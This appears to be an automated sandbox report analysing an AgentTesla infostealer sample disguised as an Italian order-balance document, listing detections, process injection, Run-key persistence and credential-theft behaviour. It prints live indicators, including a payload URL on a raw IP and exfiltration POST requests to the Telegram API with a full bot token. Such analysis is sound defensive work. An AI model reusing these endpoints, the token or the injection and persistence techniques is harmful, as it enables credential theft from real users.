Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Controllo saldo 30% Ordine 5667.exe

Overview

General Information

Sample Name:Controllo saldo 30% Ordine 5667.exe
Analysis ID:615179
MD5:2b093d7f11c0d7047686a5477347de9c
SHA1:ac5063aae56e0a299da195c305b117a2b8d648f0
SHA256:3cff2b73d77305ffe8c02b009feca9ad0fbdbbbfeec0a1db831caa127f58ef73
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Controllo saldo 30% Ordine 5667.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe" MD5: 2B093D7F11C0D7047686A5477347DE9C)
    • cmd.exe (PID: 4592 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 5 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4568 cmdline: timeout 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • InstallUtil.exe (PID: 6104 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • Vajejvz.exe (PID: 3140 cmdline: "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe" MD5: 2B093D7F11C0D7047686A5477347DE9C)
    • cmd.exe (PID: 5188 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 5 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Vajejvz.exe (PID: 2264 cmdline: "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe" MD5: 2B093D7F11C0D7047686A5477347DE9C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 18 entries
            SourceRuleDescriptionAuthorStrings
            11.0.InstallUtil.exe.400000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              11.0.InstallUtil.exe.400000.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                11.0.InstallUtil.exe.400000.3.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32c5a:$s10: logins
                • 0x326c1:$s11: credential
                • 0x2ebf7:$g1: get_Clipboard
                • 0x2ec05:$g2: get_Keyboard
                • 0x2ec12:$g3: get_Password
                • 0x2fefc:$g4: get_CtrlKeyDown
                • 0x2ff0c:$g5: get_ShiftKeyDown
                • 0x2ff1d:$g6: get_AltKeyDown
                14.2.Vajejvz.exe.4009990.1.unpackTypical_Malware_String_TransformsDetects typical strings in a reversed or otherwise modified formFlorian Roth
                • 0x18302d:$i2: sserddAcorPteG
                • 0x18303c:$i3: AyrarbiLdaoL
                0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 37 entries

                  There are no malicious signatures, click here to show all signatures.

                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: "C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe, ProcessId: 6876, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Vajejvz
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe, ProcessId: 6876, TargetFilename: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exe
                  Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentCommandLine: "C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe" , ParentImage: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe, ParentProcessId: 6876, ParentProcessName: Controllo saldo 30% Ordine 5667.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6104, ProcessName: InstallUtil.exe
                  Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c timeout 5, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4592, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3060, ProcessName: conhost.exe
                  Timestamp:04/25/22-20:44:10.068097 04/25/22-20:44:10.068097
                  SID:2034631
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Controllo saldo 30% Ordine 5667.exeVirustotal: Detection: 28%Perma Link
                  Source: Controllo saldo 30% Ordine 5667.exeReversingLabs: Detection: 21%
                  Source: http://45.137.22.163/bless_Jkvszuhw.pngAvira URL Cloud: Label: malware
                  Source: http://45.137.22.163Virustotal: Detection: 16%Perma Link
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeReversingLabs: Detection: 21%
                  Source: Controllo saldo 30% Ordine 5667.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeJoe Sandbox ML: detected
                  Source: 11.0.InstallUtil.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                  Source: 11.0.InstallUtil.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                  Source: 11.0.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 11.0.InstallUtil.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                  Source: 11.0.InstallUtil.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                  Source: 11.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: Controllo saldo 30% Ordine 5667.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49802 version: TLS 1.2
                  Source: Controllo saldo 30% Ordine 5667.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.5:49748 -> 45.137.22.163:80
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: POST /bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da26ffe4b41c47Host: api.telegram.orgContent-Length: 1025Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da26fc8d07fd83Host: api.telegram.orgContent-Length: 1025Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564464486.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.695840946.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.695269778.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163
                  Source: Vajejvz.exe, Vajejvz.exe, 0000000E.00000000.600726961.0000000000AC2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://45.137.22.163/bless_Jkvszuhw.png
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564464486.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.695840946.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.695269778.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163/bless_Jkvszuhw.pngt%Em
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                  Source: InstallUtil.exe, 0000000B.00000002.697823623.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: InstallUtil.exe, 0000000B.00000002.698836717.00000000060F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: InstallUtil.exe, 0000000B.00000002.698901290.0000000006130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.veris&v
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gSjTzr.com
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564464486.0000000002731000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.695840946.0000000002421000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.695269778.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.568766755.0000000006682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                  Source: InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.567117444.0000000003874000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000000.560528603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000000.561107496.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/
                  Source: InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocumentdocument-----
                  Source: InstallUtil.exe, 0000000B.00000002.697773792.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4vl
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.697823623.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pnLxAwPM33RwXHpPdX.org
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565099550.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564544271.000000000277B000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697494155.000000000256C000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697339824.0000000003069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565099550.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564544271.000000000277B000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697494155.000000000256C000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697339824.0000000003069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.565099550.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000002.564544271.000000000277B000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697494155.000000000256C000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697339824.0000000003069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: InstallUtil.exe, 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                  Source: unknownHTTP traffic detected: POST /bot5273807869:AAHdhflfgTbp8lRJ0nhI2erbz0crK0sBFlM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da26ffe4b41c47Host: api.telegram.orgContent-Length: 1025Expect: 100-continueConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bless_Jkvszuhw.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49802 version: TLS 1.2
                  Source: Vajejvz.exe, 0000000D.00000002.693936859.000000000071B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary

                  barindex
                  Source: 11.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 11.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38242a0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 11.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 11.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.38742c0.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 11.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.Controllo saldo 30% Ordine 5667.exe.37fc280.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 11.0.InstallUtil.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.csLarge array initialization: .cctor: array initializer size 11689
                  Source: 11.0.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bF9B9C735u002d5C39u002d415Cu002d8E3Bu002d000FD1A408E4u007d/E276BB8Au002d8E7Eu002d4661u002d9223u002dCEBB1DAB9D56.csLarge array initialization: .cctor: array initializer size 11689
